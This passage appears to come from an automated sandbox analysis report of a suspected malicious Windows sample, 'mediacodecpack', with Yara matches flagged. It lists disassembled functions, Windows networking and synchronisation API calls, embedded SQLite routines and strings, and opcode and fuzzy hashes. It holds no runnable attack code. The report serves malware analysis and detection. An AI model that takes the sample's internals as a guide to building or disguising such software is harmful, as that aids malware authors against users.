                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D53B06,?,?,?,00000001), ref: 02D580ED
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D580F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: cda164a2ca07a8c7cb023f670cd13f171cbbfa026a1b4e8f4c1c867c4135caf8
                                                                                            • Instruction ID: c4c3efe48cfa38b15c45aa5e2ed204a2501d1a4b7b4bcc97484b7408dffab1fa
                                                                                            • Opcode Fuzzy Hash: cda164a2ca07a8c7cb023f670cd13f171cbbfa026a1b4e8f4c1c867c4135caf8
                                                                                            • Instruction Fuzzy Hash: 32B09231488208ABCB102BD1F81DB583F28FB04692FE44810F60E44250CB6299B09AE2
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                            • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 02D4E873
                                                                                              • Part of subcall function 02D4E6FA: _memmove.LIBCMT ref: 02D4E7B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memmove_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3555123492-0
                                                                                            • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                            • Instruction ID: 4bbc2a0f8b02c269f949546708bc756e021f606ac1f409056787331bb881b388
                                                                                            • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                            • Instruction Fuzzy Hash: 9CF082B190430DBBD700DF99D942B8DFBB8FB44310F208169D50CA7341E6B07A118B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                            • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                            • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                            • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                            • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                            • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                            • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                            • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                            • API String ID: 1320758876-2501389569
                                                                                            • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                            • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                            • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                            • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                            APIs
                                                                                            • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                            • sqlite3_free.SQLITE3 ref: 60926526
                                                                                            • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                            • sqlite3_free.SQLITE3 ref: 60926550
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                              • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                            • sqlite3_free.SQLITE3 ref: 60926626
                                                                                            • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                            • sqlite3_free.SQLITE3 ref: 60926638
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                            • sqlite3_free.SQLITE3 ref: 60926673
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                            • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                            • API String ID: 937752868-2111127023
                                                                                            • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                            • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                            • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                            • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                            APIs
                                                                                            Strings
                                                                                            • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                            • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                            • BEGIN;, xrefs: 609485DB
                                                                                            • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                            • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                            • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                            • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                            • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                            • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                            • API String ID: 632333372-52344843
                                                                                            • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                            • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D424E6
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D424FC
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D4250E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D4256D
                                                                                            • SetLastError.KERNEL32(00000000,?,7556DFB0), ref: 02D4257F
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7556DFB0), ref: 02D42599
                                                                                            • GetLastError.KERNEL32(?,7556DFB0), ref: 02D425A2
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D425F0
                                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02D4262F
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D4268E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D42699
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D426AD
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7556DFB0), ref: 02D426BD
                                                                                            • GetLastError.KERNEL32(?,7556DFB0), ref: 02D426C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                            • String ID:
                                                                                            • API String ID: 1213838671-0
                                                                                            • Opcode ID: c1cde1fe82bfb6f26fb21f102e5c12ab51149d5624c7ac4bcbaf6912102b84c6
                                                                                            • Instruction ID: 27487fa09d6a9b0cc81f3527d7fbd878eb3a0227d3676029141eb04bb8808e7b
                                                                                            • Opcode Fuzzy Hash: c1cde1fe82bfb6f26fb21f102e5c12ab51149d5624c7ac4bcbaf6912102b84c6
                                                                                            • Instruction Fuzzy Hash: FE610971900209AFCB10DFA4D998AAEBBB9FF08314F50496AE956E7740DB34DD54CFA0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44608
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                            • htons.WS2_32(?), ref: 02D44669
                                                                                            • htonl.WS2_32(?), ref: 02D4468C
                                                                                            • htonl.WS2_32(00000000), ref: 02D44693
                                                                                            • htons.WS2_32(00000000), ref: 02D44747
                                                                                            • _sprintf.LIBCMT ref: 02D4475D
                                                                                              • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
                                                                                            • htons.WS2_32(?), ref: 02D446B0
                                                                                              • Part of subcall function 02D4873B: __EH_prolog.LIBCMT ref: 02D48740
                                                                                              • Part of subcall function 02D4873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D487BB
                                                                                              • Part of subcall function 02D4873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D487D9
                                                                                              • Part of subcall function 02D41BA7: __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                              • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                              • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                              • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                              • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                              • Part of subcall function 02D4CEF7: __EH_prolog.LIBCMT ref: 02D4CEFC
                                                                                            • htonl.WS2_32(?), ref: 02D4497C
                                                                                            • htonl.WS2_32(00000000), ref: 02D44983
                                                                                            • htonl.WS2_32(00000000), ref: 02D449C8
                                                                                            • htonl.WS2_32(00000000), ref: 02D449CF
                                                                                            • htons.WS2_32(?), ref: 02D449EF
                                                                                            • htons.WS2_32(?), ref: 02D449F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1645262487-0
                                                                                            • Opcode ID: e6d05e22069f58296717e27aa8f005a9d54870673b2ee7143c14fa7c09956888
                                                                                            • Instruction ID: 92c6ba5458641c1c5745e47cbdc5c0f34297f2939a2aee854799526aefa85bbe
                                                                                            • Opcode Fuzzy Hash: e6d05e22069f58296717e27aa8f005a9d54870673b2ee7143c14fa7c09956888
                                                                                            • Instruction Fuzzy Hash: FF023471C00259AFEF15DBA4D854BEEBBB9EF08304F10455AE945B7280EB745E88CFA1
                                                                                            APIs
                                                                                            • RtlDecodePointer.NTDLL(?), ref: 02D56EF8
                                                                                            • _free.LIBCMT ref: 02D56F11
                                                                                              • Part of subcall function 02D51F84: HeapFree.KERNEL32(00000000,00000000,?,02D54942,00000000,00000104,75570A60), ref: 02D51F98
                                                                                              • Part of subcall function 02D51F84: GetLastError.KERNEL32(00000000,?,02D54942,00000000,00000104,75570A60), ref: 02D51FAA
                                                                                            • _free.LIBCMT ref: 02D56F24
                                                                                            • _free.LIBCMT ref: 02D56F42
                                                                                            • _free.LIBCMT ref: 02D56F54
                                                                                            • _free.LIBCMT ref: 02D56F65
                                                                                            • _free.LIBCMT ref: 02D56F70
                                                                                            • _free.LIBCMT ref: 02D56F94
                                                                                            • RtlEncodePointer.NTDLL(008097A8), ref: 02D56F9B
                                                                                            • _free.LIBCMT ref: 02D56FB0
                                                                                            • _free.LIBCMT ref: 02D56FC6
                                                                                            • _free.LIBCMT ref: 02D56FEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 3064303923-0
                                                                                            • Opcode ID: ccdfc91873b487887d483833106696247337aa37d9bd4846ecc68feca4b3db7a
                                                                                            • Instruction ID: 02525ac17b6bb1697648449033a9b5ae1907ba1f7a7bde06acc323d38059ed12
                                                                                            • Opcode Fuzzy Hash: ccdfc91873b487887d483833106696247337aa37d9bd4846ecc68feca4b3db7a
                                                                                            • Instruction Fuzzy Hash: FC215136D851319FCF225F64B8406567779EB047297694929EC0897380EB7DDC68CFE0
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                            • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                            • sqlite3_free.SQLITE3 ref: 60960618
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: offsets
                                                                                            • API String ID: 463808202-2642679573
                                                                                            • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                            • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                            • String ID:
                                                                                            • API String ID: 2903785150-0
                                                                                            • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                            • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D43428
                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D4346B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D43472
                                                                                            • GetLastError.KERNEL32 ref: 02D43486
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D434D7
                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D434ED
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D43518
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                            • API String ID: 2902213904-434325024
                                                                                            • Opcode ID: 8176c897b94d848d39095b0732f37f9862324c114dce4f7ab933aad3e6931fb7
                                                                                            • Instruction ID: 15f4a69327ce84482e38a6623cd2fc450e06fa701b937fe198703b09bf8b6701
                                                                                            • Opcode Fuzzy Hash: 8176c897b94d848d39095b0732f37f9862324c114dce4f7ab933aad3e6931fb7
                                                                                            • Instruction Fuzzy Hash: A1315EB1900205DFDB119F68D858BAA7BB9FF49311F214499E8199B340DB74DD50CFB1
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                            • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                            • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                            • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
